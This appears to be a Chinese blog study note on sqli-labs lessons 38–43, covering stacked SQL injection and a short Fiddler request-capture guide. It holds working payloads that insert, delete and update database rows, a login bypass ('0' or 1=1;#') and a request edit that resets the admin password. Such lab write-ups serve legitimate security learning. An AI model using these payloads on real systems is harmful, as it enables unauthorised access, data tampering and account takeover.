DAY 8

sqli-lab Page-3

sqli-labs lesson 38

  • What is Stacked injection?
    https://blog.csdn.net/Fly_hps/article/details/80288678
  • SQL插入语句: 
    INSERT INTO table_name (column1,column2,column3,...)
VALUES (value1,value2,value3,...);

    或者

    INSERT INTO table_name
VALUES (value1,value2,value3,...);
  • payload构建:?id=1';insert into users values (99,'test','test')--+
  • 注:闭合符号、表名以及字段可以通过之前学习的方法获得。
  • 结果:

sqli-labs lesson 39

  • SQL删除语句:

    DELETE FROM table_name
WHERE some_column=some_value;
  • 跟上一题一样,只不过是数值型的参数,我们用delete语句把上次插入的记录删除
  • payload构建:?id=1;delete from users where id=99--+
  • 结果:

sqli-labs lesson 40

  • SQL更新语句:

    UPDATE table_name
SET column1=value1,column2=value2,...
WHERE some_column=some_value;
  • 利用联合查询或者盲注获得闭合符号、数据库名、表名、字段名等,更新id=1的密码
  • payload:?id=99') UNION SELECT 1,2,3;update users set password='god' where id=1--+
  • 结果:

sqli-labs lesson 41

  • 跟上一题一样,只不过是数值型注入

sqli-labs lesson 42

  • 万能密码:

    • 用户名:随意
    • 密码:0' or 1=1;#
    • 结果:直接登录id=1的账号
  • Stacked Injection:
    • 抓包:这里用Fiddler
    • 改包:密码改为1';update users set password='test' where username='admin'#
    • 结果:成功更改了admin账号的密码

sqli-labs lesson 43

  • 这一题与上一题一样,闭合符号是’)

Fiddler使用

  • 下载与安装:https://www.telerik.com/fiddler
  • 界面:
  • 抓包:
    • 快捷键F12打开抓包(默认为8888端口),出现该图标即已经打开。
    • 抓包结果在左侧。点击后左侧新增一个记录,打开后可以修改请求。
    • 修改完毕,点击

sqli-labs学习笔记 DAY8的更多相关文章

  1. Sqli - Labs 靶场笔记(一)

    Less - 1: 页面: URL: http://127.0.0.1/sqli-labs-master/Less-1/ 测试: 1.回显正常,说明不是数字型注入, http://127.0.0.1/ ...

  2. JS学习笔记Day8

    一.内置函数Math 1.Math 1)Math.abs() 求绝对值 2)Math.PI 圆周率 2.求近似值: 1)Math.round() 四舍五入(负数: >0.5 进一 <=0. ...

  3. HTML学习笔记Day8

    一.设置元素背景透明属性{background:rgba(255,255,255,0.5):} 1.元素背景透明,内容正常显示: 注:opacity:value:元素背景透明内容也透明: 2.rgba ...

  4. Python学习笔记 - day8 - 异常

    异常 在程序运行过程中,总会遇到各种各样的错误.有的错误是程序编写有问题造成的,比如本来应该输出整数结果输出了字符串,有的错误是用户输入造成的,比如让用户输入email地址,结果得到一个空字符串,这种 ...

  5. 【目录】Python学习笔记

    目录:Python学习笔记 目标:坚持每天学习,每周一篇博文 1. Python学习笔记 - day1 - 概述及安装 2.Python学习笔记 - day2 - PyCharm的基本使用 3.Pyt ...

  6. go语言,golang学习笔记1 官网下载安装,中文社区,开发工具LiteIDE

    go语言,golang学习笔记1 官网下载安装,中文社区,开发工具LiteIDE Go语言是谷歌2009发布的专门针对多处理器系统应用程序的编程进行了优化,使用Go编译的程序可以媲美C或C++代码的速 ...

  7. C51学习笔记

    转自:http://blog.csdn.net/gongyuan073/article/details/7856878 单片机C51学习笔记 一,   C51内存结构深度剖析 二,   reg51.头 ...

  8. R语言可视化学习笔记之添加p-value和显著性标记

    R语言可视化学习笔记之添加p-value和显著性标记 http://www.jianshu.com/p/b7274afff14f?from=timeline   上篇文章中提了一下如何通过ggpubr ...

  9. SQLi-Labs学习笔记

    结构化查询语言,也叫做SQL,从根本上说是一种处理数据库的编程语言.对于初学者,数据库仅仅是在客户端和服务端进行数据存储.SQL通过结构化查询,关系,面向对象编程等等来管理数据库.编程极客们总是搞出许 ...

随机推荐

  1. 【转】Android中获取应用程序(包)的信息-----PackageManager的使用(一)

    转载请注明出处:http://blog.csdn.net/qinjuning       本节内容是如何获取Android系统中应用程序的信息,主要包括packagename.label.icon.占 ...

  2. vs未能正确加载XXX包,编译时停止工作问题

    出现这个问题的原因可能是配置更改或安装了另一个扩展,幸好之前用的不多,重新进行用户配置代价也不高,打开Visual Studio Tools:  选择VS2013 开发人员命令提示:  输入deven ...

  3. TensorFlow安装-Windows

    参考:https://blog.csdn.net/dou3516/article/details/77836459 一.安装环境 TensorFlow即可以支持CPU,也可以支持CPU+GPU.前者的 ...

  4. 中国城市json

    [{ "label": "北京Beijing010", "name": "北京", "pinyin" ...

  5. C语言程序设计I—第四周教学

    第四周教学安排 第四周是本课程的第三次课,依然是我来讲解,学生听讲,也依然继续在寻找大班授课(100人).条件有限(民办学校教学经费投入不够)的情况下如何更好的组织教学. 教学内容 第二章 用C语言编 ...

  6. MapReduce开发程序,运行环境配置

    Hadoop主机:linux 开发环境主机:Win7 + Itellij 本地运行 1. 下载hadoop安装包,放到本地目录中. 2. 配置环境变量$HADOOP_HOME及$PATH=$HADOO ...

  7. IOS马甲包(诚招大量开发)

    马甲包的字面意思给产品穿马甲,但是我认为马甲包更像是产品的一种分身,一种和产品一样拥有灵魂,拥有肉身的一种分身.它能为产品带来同样的功能效果. 一.什么是马甲包通过技术手段,多次上架同一款产品的方法. ...

  8. 与数论的爱恨情仇--01:判断大素数的Miller-Rabin

    在我们需要判断一个数是否是素数的时候,最容易想到的就是那个熟悉的O(√n)的算法.那个算法非常的简单易懂,但如果我们仔细想想,当n这个数字很大的时候,这个算法其实是不够用的,时间复杂度会相对比较高. ...

  9. 树莓3B+_teamviewer_install

    操作系统 pi@raspberrypi:~ $ uname -a Linux raspberrypi 4.14.79-v7+ #1159 SMP Sun Nov 4 17:50:20 GMT 2018 ...

  10. Scratch 3.0 版本比较

    新年伊始MIT 就正式 发布了Scratch最新3.0版 ,以 HTML5.0 为基础的版本! 本文就来带看看3.0版有哪些更新的地方. 下图是进入后第一个画面,跟Scratch 2.0 很像,熟悉的 ...